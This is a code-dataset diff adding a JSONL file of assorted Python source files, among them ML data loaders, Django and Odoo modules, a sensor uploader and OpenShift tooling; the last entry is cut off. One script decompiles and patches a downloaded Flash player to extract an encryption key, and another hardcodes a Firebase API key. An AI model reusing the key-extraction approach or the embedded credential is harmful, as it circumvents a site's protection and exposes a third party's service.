diff --git "a/2527.jsonl" "b/2527.jsonl" new file mode 100644--- /dev/null +++ "b/2527.jsonl" @@ -0,0 +1,702 @@ +{"seq_id":"129988797","text":"from django.core.management.base import BaseCommand, CommandError\nfrom core.models import UserProfile\nimport csv\nfrom datetime import datetime\n\nclass Command(BaseCommand):\n help = 'Loads users csv'\n\n def add_arguments(self, parser):\n parser.add_argument('file_path', nargs=1, type=str)\n \n def handle(self, *args, **options):\n file_path = options['file_path'][0]\n\n with open(file_path) as file:\n reader = csv.reader(file, delimiter='\\t')\n next(reader)\n for row in reader:\n\n self.stdout.write(self.style.NOTICE('Row: \"%s\"' % row))\n\n user, created = UserProfile.objects.get_or_create(\n id=row[0],\n gender=row[2] if row[2] != '' else None,\n age=row[2] if row[2] != '' else None,\n country=row[3],\n registered_at=datetime.strptime(row[4], '%b %d, %Y') if row[4] != '' else None \n )\n\n if created:\n self.stdout.write(self.style.SUCCESS('Created user: \"%s\"' % user.id))\n else:\n self.stdout.write(self.style.WARNING('User \"%s\" already exists' % user.id))","sub_path":"recommender/core/management/commands/load_users_profile.py","file_name":"load_users_profile.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"396305079","text":"# -*- coding: utf-8 -*-\n# Soohwan Kim @sooftware\n# This source code is licensed under the Apache 2.0 License license found in the\n# LICENSE file in the root directory of this source tree\n\nimport math\nimport random\nimport torch\nimport threading\nfrom torch.utils.data import Dataset\nfrom tacotron2.data.audio.parser import MelSpectrogramParser\nfrom tacotron2.data.text import text_to_sequence\nfrom tacotron2.utils import logger\n\n\nclass TextMelDataset(Dataset, MelSpectrogramParser):\n \"\"\"\n Dataset for Text & Mel-Spectrogram matching\n\n Args:\n audio_paths (list): list of audio_path\n transcripts (list): list of transcript\n feature_extract_by (str): which library to use extract mel spectrogram\n sample_rate (int): sampling rate of audio files\n num_mel_bins (int): number of mel bins\n frame_length_ms (float): frame length milliseconds unit\n frame_shift_ms (float): frame shift milliseconds unit\n \"\"\"\n def __init__(\n self,\n audio_paths: list,\n transcripts: list,\n feature_extract_by: str,\n sample_rate: int = 22050,\n num_mel_bins: int = 80,\n frame_length_ms: float = 50,\n frame_shift_ms: float = 12.5\n ):\n super(TextMelDataset, self).__init__(feature_extract_by, sample_rate, num_mel_bins, frame_length_ms, frame_shift_ms)\n self.audio_paths = audio_paths\n self.transcripts = transcripts\n\n def parse_text(self, text):\n return torch.IntTensor(text_to_sequence(text, 'english_cleaner'))\n\n def get_item(self, index):\n text = self.parse_text(self.transcripts[index])\n mel_spectrogram = self.parse_audio(self.audio_paths[index])\n\n return text, mel_spectrogram\n\n def shuffle(self):\n tmp = list(zip(self.audio_paths, self.transcripts))\n random.shuffle(tmp)\n self.audio_paths, self.transcripts = zip(*tmp)\n\n def __len__(self):\n return len(self.audio_paths)\n\n def count(self):\n return len(self.audio_paths)\n\n\nclass TextMelDataLoader(threading.Thread):\n def __init__(self, dataset: TextMelDataset, queue, batch_size, thread_id, pad_id):\n threading.Thread.__init__(self)\n self.dataset = dataset\n self.queue = queue\n self.index = 0\n self.batch_size = batch_size\n self.dataset_count = dataset.count()\n self.thread_id = thread_id\n self.pad_id = pad_id\n\n def create_empty_batch(self):\n seqs = torch.zeros(0, 0, 0)\n targets = torch.zeros(0, 0).to(torch.long)\n\n seq_lengths = list()\n target_lengths = list()\n\n return seqs, targets, seq_lengths, target_lengths\n\n def run(self):\n \"\"\" Load data from MelSpectrogramDataset \"\"\"\n logger.debug('loader %d start' % self.thread_id)\n\n while True:\n items = list()\n\n for _ in range(self.batch_size):\n if self.index >= self.dataset_count:\n break\n\n text, mel_spectrogram = self.dataset.get_item(self.index)\n\n if mel_spectrogram is not None:\n items.append((text, mel_spectrogram))\n\n self.index += 1\n\n if len(items) == 0:\n batch = self.create_empty_batch()\n self.queue.put(batch)\n break\n\n batch = self.collate_fn(items)\n self.queue.put(batch)\n\n logger.debug('loader %d stop' % self.thread_id)\n\n def collate_fn(self, batch):\n def seq_length_(p):\n return len(p[0])\n\n def target_length_(p):\n return len(p[1])\n\n # sort by sequence length for rnn.pack_padded_sequence()\n batch = sorted(batch, key=lambda sample: sample[0].size(0), reverse=True)\n\n input_lengths = [len(s[0]) for s in batch]\n target_lengths = [len(s[1]) for s in batch]\n\n max_seq_sample = max(batch, key=seq_length_)[0]\n max_target_sample = max(batch, key=target_length_)[1]\n\n max_seq_size = max_seq_sample.size(0)\n max_target_size = len(max_target_sample)\n\n feat_size = max_seq_sample.size(1)\n batch_size = len(batch)\n\n inputs = torch.zeros(batch_size, max_seq_size, feat_size)\n\n targets = torch.zeros(batch_size, max_target_size).to(torch.long)\n targets.fill_(self.pad_id)\n\n for x in range(batch_size):\n sample = batch[x]\n tensor = sample[0]\n target = sample[1]\n seq_length = tensor.size(0)\n\n inputs[x].narrow(0, 0, seq_length).copy_(tensor)\n targets[x].narrow(0, 0, len(target)).copy_(torch.LongTensor(target))\n\n input_lengths = torch.IntTensor(input_lengths)\n\n return inputs, targets, input_lengths, target_lengths\n\n def count(self):\n return math.ceil(self.dataset_count / self.batch_size)\n\n\nclass MultiDataLoader(object):\n \"\"\"\n Multi Data Loader using Threads.\n\n Args:\n dataset_list (list): list of MelSpectrogramDataset\n queue (Queue.queue): queue for threading\n batch_size (int): size of batch\n num_workers (int): the number of cpu cores used\n \"\"\"\n def __init__(self, dataset_list, queue, batch_size, num_workers):\n self.dataset_list = dataset_list\n self.queue = queue\n self.batch_size = batch_size\n self.num_workers = num_workers\n self.loader = list()\n\n for idx in range(self.num_workers):\n self.loader.append(TextMelDataLoader(self.dataset_list[idx], self.queue, self.batch_size, idx))\n\n def start(self):\n \"\"\" Run threads \"\"\"\n for idx in range(self.num_workers):\n self.loader[idx].start()\n\n def join(self):\n \"\"\" Wait for the other threads \"\"\"\n for idx in range(self.num_workers):\n self.loader[idx].join()\n","sub_path":"tacotron2/data/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"161475486","text":"#!/usr/bin/python3\n\nfrom uio import Uio\nimport ctypes\n\n########## bitBlanket #####################################\n#\n# \n# Adapted from zmatt's l3-sn-test.py\n#\n# The point of this class was to avoid \"driver developers\" from having to pass\n# a c structure to the uio class. In case a different solution is found, as\n# long as uio passes back a bitBlanket, which contains general functions for\n# accessing registers in python, the mechanics interacting with lib uio can continue to\n# evolve without affecting libraries built on top of it.\n# Bit blanket works so that you can create a bitBlanket object, say ADC,\n# and then read AND write BYTES (the internal cstructure uses c_ubyte) in\n# the forms ADC[(0,4)] where it's (offset, length) and length can be ommited to\n# use the default value... or use ADC[SOMEREGISTERNAME], where the string is\n# mapped to an offset by a dictionary object passed when the object is\n# initialized. I made a script that will parse the table of contents in the\n# DATASHEET and generate code for a dictionary object. This doesn't support\n# bit-by-bit access, but it may in the future with a similiar dictionary\n# concept. The idea was to make the interface similiar to people who\n# programmed with atmel-studio (avr) or likewise, advanced Arduino.\n# \n#\n\n\nclass bitBlanket():\n def __init__(self, uioLabel, size, defaultWordLength = 4):\n self.defaultWordLength = defaultWordLength\n self.myUio = Uio(uioLabel)\n self.memBlanket = type(\"memBlanket\", (ctypes.Structure,),\n {\n \"_fields_\": [(\"number\", ctypes.c_ubyte*int(size))],\n \"__getitem__\": bitBlanket.getitem,\n \"__setitem__\":bitBlanket.setitem\n }\n )\n self.memBlanket = self.myUio.map(self.memBlanket)\n\n byteSize = (ctypes.c_ubyte, ctypes.c_ushort, ctypes.c_uint,\n ctypes.c_ulong)\n def __getitem__(self, i):\n #rehandle slices\n if isinstance(i, int):\n i = (i, self.defaultWordLength)\n return self.memBlanket[i].value\n\n def __setitem__(self, i, value):\n #rehandle slices\n #if isinstance(i, int):\n # i = (i, self.defaultWordLength)\n self.memBlanket[i] = value\n\n def getitem(self, i):\n if not isinstance(i, tuple) or (i.__len__() != 2):\n raise TypeError('subindices must be 2-element tuples: %r' % i)\n try:\n pointerType = bitBlanket.byteSize[int(i[1]/2)]\n except ValueError:\n print('second indice must be 1, 2, 4, or 8 (bytes)')\n raise\n return ctypes.cast(ctypes.byref(getattr(self, \"number\"), i[0]),\n ctypes.POINTER(pointerType)).contents\n\n\n def setitem(self, i, value):\n if not isinstance(i, tuple) or (i.__len__() != 2):\n raise TypeError('subindices must be 2-element tuples: %r' % i)\n try:\n pointerType = bitBlanket.byteSize[int(i[1]/2)]\n except ValueError:\n print('second indice must be 1, 2, 4, or 8 (bytes)')\n raise\n ctypes.cast(ctypes.byref(getattr(self, \"number\"), i[0]),\n ctypes.POINTER(pointerType))[0] = pointerType(value)\n","sub_path":"bitblanket.py","file_name":"bitblanket.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"179712033","text":"import gym\nimport numpy as np\n\n\n\"\"\"Data generation for the case of a single block pick and place in Fetch Env\"\"\"\n\nactions = []\nobservations = []\ninfos = []\nvectorize_observation = False\n\ndef main():\n env = gym.make('FetchDrawTriangle-v1')\n numItr = 100\n initStateSpace = \"random\"\n env.reset()\n print(\"Reset!\")\n while len(actions) < numItr:\n obs = env.reset()\n print(\"ITERATION NUMBER \", len(actions))\n goToGoal(env, obs)\n\n\n fileName = \"data_fetch_draw\"\n fileName += \"_\" + initStateSpace\n fileName += \"_\" + str(numItr)\n fileName += \".npz\"\n\n np.savez_compressed(fileName, acs=actions, obs=observations, info=infos) # save the file\n return fileName\n\ndef vectorize_obs(obs):\n vect_obs = []\n for k,v in obs.items():\n for element in v:\n vect_obs.append(element)\n return vect_obs\n \ndef goToGoal(env, lastObs):\n\n achieved_goals = np.array(lastObs['achieved_goal'])\n achieved_goals = achieved_goals.reshape((9,3))\n desired_goals = np.array(lastObs['desired_goal'])\n desired_goals = desired_goals.reshape((9,3))\n \n episodeAcs = []\n episodeObs = []\n episodeInfo = []\n dginx = 0\n\n timeStep = 0 #count the total number of timesteps\n if vectorize_observation:\n episodeObs.append(vectorize_obs(lastObs))\n else:\n episodeObs.append(lastObs)\n cur_grip_pos = lastObs['observation'][0:3]\n while timeStep <= env._max_episode_steps:\n \n timeStep += 1\n # env.render()\n \n #print(cur_grip_pos)\n a = (desired_goals[dginx,:] - cur_grip_pos) \n print(a)\n action = [a[0], a[1], a[2], 0.15]\n obsDataNew, reward, done, info = env.step(action)\n \n cur_grip_pos = obsDataNew['observation'][0:3]\n\n achieved_goals = np.array(obsDataNew['achieved_goal'])\n achieved_goals = achieved_goals.reshape((9,3))\n desired_goals = np.array(obsDataNew['desired_goal'])\n desired_goals = desired_goals.reshape((9,3))\n \n #print(achieved_goals)\n print(desired_goals[dginx,:])\n ag = achieved_goals[dginx,:]\n dg = desired_goals[dginx,:]\n\n dist = np.linalg.norm(np.array(ag) - np.array(dg), axis=-1)\n \n if (dist < 0.05) and dginx < 8 :\n dginx +=1\n\n if timeStep < env._max_episode_steps:\n if vectorize_observation:\n episodeObs.append(vectorize_obs(obsDataNew))\n else:\n episodeObs.append(obsDataNew)\n\n\n\n episodeAcs.append(action)\n episodeInfo.append(info)\n\n if timeStep >= env._max_episode_steps: break\n\n actions.append(episodeAcs)\n observations.append(episodeObs)\n infos.append(episodeInfo)\n\ndef test(filename):\n print('Test')\n data = np.load(fileName)\n print('Obs shape={}'.format(data['obs'].shape))\n print('Acs shape={}'.format(data['acs'].shape))\n print('Infos shape={}'.format(data['info'].shape))\n\nif __name__ == \"__main__\":\n fileName = main()\n test(fileName)\n","sub_path":"baselines/her/experiment/data_generation/fetch_draw_data_gen.py","file_name":"fetch_draw_data_gen.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"172882910","text":"from sense_hat import SenseHat\nimport time\nimport datetime\nfrom time import sleep\n\nimport pyrebase\nimport sys\n\n\nconfig = {\n\t\"apiKey\": \"AIzaSyCYu7gE_4HGDIy7pOOiw0AY-rrUmoE7eXQ\",\n \t\"authDomain\": \"sensehat-51bd7.firebaseapp.com\",\n \t\"databaseURL\": \"https://sensehat-51bd7.firebaseio.com\",\n \t\"storageBucket\": \"sensehat-51bd7.appspot.com\"\n}\n\nfirebase = pyrebase.initialize_app(config)\ndb = firebase.database()\n\n\nsense = SenseHat()\n\nwhile True:\n\ttime_sense = time.strftime('%H:%M:%S')\n\tdate_sense = time.strftime('%d/%m/%Y')\n\thumidity = round((sense.get_humidity()*64)/100,1)\n\ttemperature = round(sense.get_temperature(),1)\n\tpressure = round(sense.get_pressure(),1)\n\t\n\t\n\tprint(\"Humidity %s \" %humidity)\n\tprint(\"Temperature %s Degrees Celcius\" %temperature)\n\tprint(\"Pressure: %s Millibars\" %pressure)\n\tprint\n\n\tdata = {\"Date\": date_sense,\"Time\": time_sense, \"Temperature\": temperature, \"Humidity\": humidity, \"Pressure\": pressure}\n\tdb.child(\"/message\").push(data)\t\n\n\tsense.show_message(\"Hello world\")\n\t\n\ttime.sleep(5)\n\t\n","sub_path":"Sensor/sensor_firebase.py","file_name":"sensor_firebase.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"100989963","text":"from .dialog import *\n\n\nclass InputDialogInputField(DialogInputField):\n\n _field_borders = ()\n _img_offset = (0, 0)\n\n @classmethod\n def __set_field_borders(cls):\n\n l, r, b, t = TextureAtlas[\"outer_borders\"][\"dialog_inset1\"]\n cls._field_borders = (l, r, b, t)\n cls._img_offset = (-l, -t)\n\n def __init__(self, parent, width, on_key_enter=None, on_key_escape=None):\n\n if not self._field_borders:\n self.__set_field_borders()\n\n DialogInputField.__init__(self, parent, INSET1_BORDER_GFX_DATA, width,\n on_key_enter=on_key_enter, on_key_escape=on_key_escape)\n\n self.set_image_offset(self._img_offset)\n\n def get_outer_borders(self):\n\n return self._field_borders\n\n\nclass InputDialog(Dialog):\n\n def __init__(self, title=\"\", message=\"\", default_input=\"\", choices=\"okcancel\",\n ok_alias=\"OK\", on_yes=None, on_no=None, on_cancel=None):\n\n def command():\n\n if on_yes:\n on_yes(self._input)\n\n Dialog.__init__(self, title, choices, ok_alias, command, on_no, on_cancel)\n\n self._input = \"\"\n client_sizer = self.get_client_sizer()\n borders = (50, 50, 30, 30)\n text = DialogMessageText(self, message)\n client_sizer.add(text, borders=borders, alignment=\"center_h\")\n on_key_enter = lambda: self.close(answer=\"yes\")\n field = InputDialogInputField(self, 100, on_key_enter=on_key_enter, on_key_escape=self.close)\n field.add_value(\"input\", \"string\")\n field.set_input_parser(\"input\", self.__parse_input)\n field.show_value(\"input\")\n borders = (50, 50, 30, 0)\n client_sizer.add(field, borders=borders, expand=True)\n\n self.finalize()\n\n field.set_text(\"input\", default_input)\n field.on_left_down()\n\n def __parse_input(self, input_str):\n\n self._input = input_str.strip()\n\n return self._input\n","sub_path":"src/gui/dialog/input_dialog.py","file_name":"input_dialog.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"592099498","text":"# import tweepy library\n\nimport tweepy\nfrom tweepy import Stream\nfrom tweepy.streaming import StreamListener\nimport json\n\n\n#credential variables\n\naccess_token = \"\"\naccess_token_secret = \"\"\nconsumer_key = \"\"\nconsumer_key_secret = \"\"\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_key_secret)\nauth.set_access_token(access_token,access_token_secret)\n\napi = tweepy.API(auth)\n\n\n#print(api.trends_place(23424975))\n\ntrendingTweets = api.trends_place(23424975)\n\n# TwitterListener CLass\n\n##Collecting tweets for: The Lion King\nclass TweetListener(StreamListener):\n\n def on_data(self, raw_data):\n try:\n with open('rio2016.json', 'a') as f:\n f.write(raw_data)\n return True\n except BaseException as e:\n print(\"Error on_data: %s\" % str(e))\n return True\n\n def on_error(self, status_code):\n print(status_code)\n return True\n\n#end of TwitterListener Class\n\ntwitterStream = Stream(auth, TweetListener())\ntwitterStream.filter(track=['#Rio2016'])\n##End of Streamer\n","sub_path":"streamer.py","file_name":"streamer.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"432623070","text":"import errno\nimport os\nimport os.path\nimport re\nimport shutil\nimport subprocess\nimport threading\ntry:\n from urllib.request import urlopen as compat_urllib_request_urlopen\nexcept ImportError:\n from urllib2 import urlopen as compat_urllib_request_urlopen\n\ntry:\n from urllib.request import urlretrieve as compat_urllib_request_urlretrieve\nexcept ImportError:\n from urllib import urlretrieve as compat_urllib_request_urlretrieve\n\nfrom config import PAGE_URL\nfrom server import run_server\nfrom selenium_runner import SeleniumRunner\nfrom common import full_path\n\n\ndef get_swf():\n print('Downloading the page %s' % PAGE_URL)\n urlh = compat_urllib_request_urlopen(PAGE_URL)\n webpage = urlh.read().decode('utf-8')\n urlh.close()\n mobj = re.search(r'http://[^\\'\"]+MainPlayer[^.]+\\.swf', webpage)\n swf_url = mobj.group(0)\n swf_path = full_path(os.path.basename(swf_url))\n\n print('SWF URL is %s' % swf_url)\n\n compat_urllib_request_urlretrieve(swf_url, filename=swf_path)\n return swf_path, swf_url\n\n\ndef run(args):\n print(' '.join(args))\n subprocess.check_call(args)\n\n\ndef patch_swf(swf_path):\n swf_name = os.path.splitext(os.path.basename(swf_path))[0]\n abc_index = 0\n abc_id = '%s-%d' % (swf_name, abc_index)\n\n try:\n os.remove(full_path('%s.abc' % abc_id))\n shutil.rmtree(full_path(abc_id))\n except OSError as e:\n if e.errno != errno.ENOENT:\n raise\n\n run(['abcexport', full_path('%s.swf' % swf_name)])\n run(['rabcdasm', full_path('%s.abc' % abc_id)])\n subprocess.Popen([\n 'patch', '-p0', '-i', '../asasm.patch'], cwd=full_path(abc_id)).wait()\n run(['rabcasm', full_path('%s/%s.main.asasm' % (abc_id, abc_id))])\n run([\n 'abcreplace', full_path('%s.swf' % swf_name), str(abc_index),\n full_path('%s/%s.main.abc' % (abc_id, abc_id))])\n\nif __name__ == '__main__':\n lock = threading.Lock()\n swf_path, swf_url = get_swf()\n patch_swf(swf_path)\n SeleniumRunner(lock).start()\n collected_data = run_server(swf_url, lock)\n enc_key = os.path.commonprefix(collected_data)\n print('enc_key = %s' % enc_key)\n","sub_path":"src/get_swf.py","file_name":"get_swf.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"339386682","text":"# -*- coding: utf-8 -*-\n# pragma pylint: disable=unused-argument, no-self-use\n# (c) Copyright Ryan Gordon. 2021. All Rights Reserved.\nfrom .i_subparser import ISubParser\nfrom resilient_sdk.app import get_main_app_sub_parser\nfrom resilient_sdk.util.sdk_argparse import SDKArgHelpFormatter\nfrom cp4s_sdk.cmds.appx.appx_publish import AppXPublishCmd\n\n\nclass AppExchangeSubParser(ISubParser):\n \"\"\"AppExchangeSubParser is an ArgumentParser\n which delagates work to the cp4s_connector_sdk\n python module.\n When a user targets the 'soar' product on the cp4s-sdk\n this AppExchangeSubParser handles it and invokes the appropriate sdk command.\n\n :param ISubParser: A generic type that represents the contract a subparser must uphold\n :type ISubParser: Interface\n \"\"\"\n\n product = \"appx\"\n registered = False\n\n def register_subparser(self, *args, **kwargs):\n if not kwargs.get(\"parent_parser\", False):\n raise ValueError(\n \"No Parent Parser was found in kwargs, this is needed to ensure we can attach the {} commands\".format(\n self.product))\n\n parent = kwargs.get(\"parent_parser\")\n # Top level product name\n self.parser = parent.add_parser(self.product, help=\"(Preview)Commands for working with the App Exchange\",\n formatter_class=SDKArgHelpFormatter,\n conflict_handler='resolve')\n\n # Get sub_parser object which will attach the available commands for the product SDK\n soar_sub_parser = get_main_app_sub_parser(self.parser)\n self.registered = True\n # By instantiating each command and passing the subparser we register each subcommand of the soar product\n self.cmd_publish = AppXPublishCmd(soar_sub_parser)\n return soar_sub_parser\n\n def is_registered(self, *args, **kwargs):\n return self.registered\n\n def handle_command_invocation(self, product_args):\n # Evaluate the cmd and link to a piece of functionality\n # Handle what subcommand was called\n if product_args.cmd == self.cmd_publish.CMD_NAME:\n self.cmd_publish.execute_command(product_args)\n else:\n self.parser.print_help()\n","sub_path":"cp4s_sdk/subparsers/appx_subparser.py","file_name":"appx_subparser.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"644421160","text":"import config as cf\r\nimport numpy as np\r\nimport math\r\nimport random\r\nfrom random import *\r\nimport networkx as nx\r\nfrom network import Node\r\nfrom network import Energy\r\n\r\ndef init_network():\r\n print('INITIALIGING NETWORK...')\r\n network = nx.DiGraph()\r\n position = np.random.uniform(low=0, high=cf.AREA_H, size=(cf.N_NODE+1,2))\r\n network.add_node(0,pos=(cf.SINK_X,cf.SINK_Y), res_energy=5000,round=0, Next=False, N_Packet = 0, Dist=[], Cover = []) ##BS\r\n Alive_Node = []\r\n \r\n R_MAX = 0\r\n for i in range(1,cf.N_NODE+1):\r\n # uniform(cf.E_INIT*0.5,cf.E_INIT)\r\n R_tmp = math.sqrt((position[i][0]-cf.SINK_X)**2 + (position[i][1]-cf.SINK_Y)**2)\r\n network.add_node(i, pos=position[i], res_energy=uniform(0.5,cf.E_INIT), round=1, Next=0, N_Packet = cf.L, Dist=[], Cover = [], RTBS = R_tmp)\r\n network.add_edge(i,0)\r\n Alive_Node.append(i)\r\n if R_tmp > R_MAX:\r\n R_MAX = R_tmp\r\n \r\n\r\n R = R_MAX/math.sqrt(cf.NB_Cluster)\r\n for i in range(1,cf.N_NODE+1):\r\n x,y = position[i]\r\n for j in range(1,cf.N_NODE+1):\r\n if j == i:\r\n continue\r\n x2,y2 = position[j]\r\n dist = math.sqrt((x-x2)**2 + (y-y2)**2)\r\n if dist < R:\r\n network.node[i]['Cover'].append(j)\r\n network.node[i]['Dist'].append(dist) \r\n\r\n return network, Alive_Node, R\r\n\r\ndef Run_Round(network,Alive_Node,CHID,Optimizer):\r\n Death_Node=[]\r\n Res_Energy = []\r\n\r\n ## Recieve from BS(CH info)\r\n for i in CHID:\r\n IS_DEATH=0\r\n network, IS_DEATH = Node.Receive(network, i,cf.L)\r\n if IS_DEATH == 1:\r\n Death_Node.append(i)\r\n\r\n ## TX & RX\r\n Rx_Node = []\r\n for i in Alive_Node:\r\n Rx_Node = network.node[i]['Next']\r\n if Rx_Node == 0:\r\n MSG = cf.L\r\n network.node[Rx_Node]['N_Packet'] += MSG\r\n if Optimizer == 'SSMOECHS':\r\n network.node[Rx_Node]['N_Packet'] += MSG\r\n else:\r\n MSG = cf.NCH_L\r\n IS_DEATH = 0\r\n network, IS_DEATH = Node.Transmit(network,i,Rx_Node,MSG)\r\n \r\n\r\n ## Data Tx and Rx\r\n if IS_DEATH == 1: ##Transmit Fail\r\n Death_Node.append(i)\r\n else: \r\n network, IS_DEATH = Node.Receive(network,Rx_Node,MSG)\r\n if IS_DEATH == 1: ##Recieve Fail\r\n Death_Node.append(Rx_Node)\r\n Alive_Node = list(set(Alive_Node) - set(Death_Node))\r\n\r\n for i in Alive_Node:\r\n Res_Energy.append([i,network.node[i]['res_energy']])\r\n\r\n\r\n return network, Alive_Node, Res_Energy\r\n\r\n\r\n# def add_edge(network,Start_NODE,Goal_NODE):\r\n# # if network.node[Start_NODE]['Head'] == 'CH':\r\n# # N = len(network.in_edges(Start_NODE))+1\r\n# # cost = Energy.ETX(network,Start_NODE,Goal_NODE) + cf.E_DA + N*cf.E_RX\r\n# # else:\r\n# cost = Energy.ETX(network,Start_NODE,Goal_NODE)\r\n# network.add_edge(Start_NODE,Goal_NODE)\r\n# network.node[Start_NODE]['Cost']= cost\r\n# return network","sub_path":"SSMOECHS/network/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"341326665","text":"from django.contrib import admin\nfrom django.urls import path\n\nfrom . import views\n\napp_name='polls'\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('pracownicy/', views.detail_pracownicy),\n path('stanowiska/', views.detail_stanowiska),\n path('szkolenia/', views.detail_szkolenia),\n path('urlopy/', views.detail_urlopy),\n path('zatrudnienia/', views.detail_zatrudnienie),\n path('premia/', views.detail_premia),\n path('projekty/', views.detail_projekty),\n path('rekrutacja/', views.detail_rekrutacja),\n path('usun_pracownika//', views.usun_f),\n path('usun_stanowisko//', views.usun_st),\n path('usun_projekt//', views.usun_proj),\n path('usun_zatrudnienie//', views.usun_zat),\n path('formularz/', views.form_f),\n path('formularz_premia/', views.form_prem),\n path('formularz_projekty/', views.form_proj),\n path('formularz_rekrutacja/', views.form_rekr),\n path('formularz_stanowiska/', views.form_stan),\n path('formularz_szkolenia/', views.form_szkol),\n path('formularz_urlopy/', views.form_urlop),\n path('formularz_zatrudnienia/', views.form_zatr),\n path('edycja_stanowiska//', views.edycja_s),\n path('edycja_projekt//', views.edycja_proj),\n path('edycja_zatrudnienie//', views.edycja_zatr),\n path('edycja_rekruta//', views.edycja_rekr),\n]","sub_path":"polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"550015134","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models\n\n\nclass StockPicking(models.Model):\n _inherit = \"stock.picking\"\n\n digital_id = fields.Integer(compute='_get_digital_id', string='Digital Id', readonly=True)\n\n @api.depends('name')\n def _get_digital_id(self):\n try:\n self.digital_id = self.name.split('POI/LIV/')[1]\n except IndexError:\n self.digital_id = self.name.split('POI/REC/')[1]\n","sub_path":"13.0/professional_templates_3jd/models/stock_picking.py","file_name":"stock_picking.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"628596568","text":"import itertools\nimport logging\n\nfrom sretoolbox.utils import threaded\n\nfrom reconcile import (\n openshift_groups,\n openshift_rolebindings,\n queries,\n)\nfrom reconcile.utils.defer import defer\nfrom reconcile.utils.oc import OC_Map\n\nQONTRACT_INTEGRATION = \"openshift-users\"\n\n\ndef get_cluster_users(cluster, oc_map, clusters):\n oc = oc_map.get(cluster)\n if not oc:\n logging.log(level=oc.log_level, msg=oc.message)\n return []\n users: list[str] = []\n\n # get cluster info for current cluster name from clusters list\n cluster_info = next((cl for cl in clusters if cl[\"name\"] == cluster))\n\n # backwarts compatibiltiy for clusters w/o auth\n identity_prefixes = [\"github\"]\n\n for auth in cluster_info[\"auth\"]:\n if auth[\"service\"] == \"oidc\":\n identity_prefixes.append(auth[\"name\"])\n\n for u in oc.get_users():\n if u[\"metadata\"].get(\"labels\", {}).get(\"admin\", \"\"):\n # ignore admins\n continue\n if any(\n identity.startswith(identity_prefix)\n for identity in u.get(\"identities\", [])\n for identity_prefix in identity_prefixes\n ):\n # the user has at least one identitiy which is managed by app-interface\n users.append(u[\"metadata\"][\"name\"])\n\n return [{\"cluster\": cluster, \"user\": user} for user in users]\n\n\ndef fetch_current_state(thread_pool_size, internal, use_jump_host):\n clusters = queries.get_clusters(minimal=True)\n settings = queries.get_app_interface_settings()\n oc_map = OC_Map(\n clusters=clusters,\n integration=QONTRACT_INTEGRATION,\n settings=settings,\n internal=internal,\n use_jump_host=use_jump_host,\n thread_pool_size=thread_pool_size,\n )\n results = threaded.run(\n get_cluster_users,\n oc_map.clusters(include_errors=True),\n thread_pool_size,\n oc_map=oc_map,\n clusters=clusters,\n )\n current_state = list(itertools.chain.from_iterable(results))\n return oc_map, current_state\n\n\ndef fetch_desired_state(oc_map):\n desired_state = []\n flat_rolebindings_desired_state = openshift_rolebindings.fetch_desired_state(\n ri=None, oc_map=oc_map\n )\n desired_state.extend(flat_rolebindings_desired_state)\n\n groups_desired_state = openshift_groups.fetch_desired_state(oc_map)\n flat_groups_desired_state = [\n {\"cluster\": s[\"cluster\"], \"user\": s[\"user\"]} for s in groups_desired_state\n ]\n desired_state.extend(flat_groups_desired_state)\n\n return desired_state\n\n\ndef calculate_diff(current_state, desired_state):\n diff = []\n users_to_del = subtract_states(current_state, desired_state, \"del_user\")\n diff.extend(users_to_del)\n\n return diff\n\n\ndef subtract_states(from_state, subtract_state, action):\n result = []\n\n for f_user in from_state:\n found = False\n for s_user in subtract_state:\n if f_user != s_user:\n continue\n found = True\n break\n if not found:\n result.append(\n {\"action\": action, \"cluster\": f_user[\"cluster\"], \"user\": f_user[\"user\"]}\n )\n\n return result\n\n\ndef act(diff, oc_map):\n cluster = diff[\"cluster\"]\n user = diff[\"user\"]\n action = diff[\"action\"]\n\n if action == \"del_user\":\n oc_map.get(cluster).delete_user(user)\n else:\n raise Exception(\"invalid action: {}\".format(action))\n\n\n@defer\ndef run(dry_run, thread_pool_size=10, internal=None, use_jump_host=True, defer=None):\n oc_map, current_state = fetch_current_state(\n thread_pool_size, internal, use_jump_host\n )\n defer(oc_map.cleanup)\n desired_state = fetch_desired_state(oc_map)\n\n diffs = calculate_diff(current_state, desired_state)\n\n for diff in diffs:\n logging.info(list(diff.values()))\n\n if not dry_run:\n act(diff, oc_map)\n","sub_path":"reconcile/openshift_users.py","file_name":"openshift_users.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"478243490","text":"from bokeh.core.properties import Instance\nfrom bokeh.io import output_file, show\nfrom 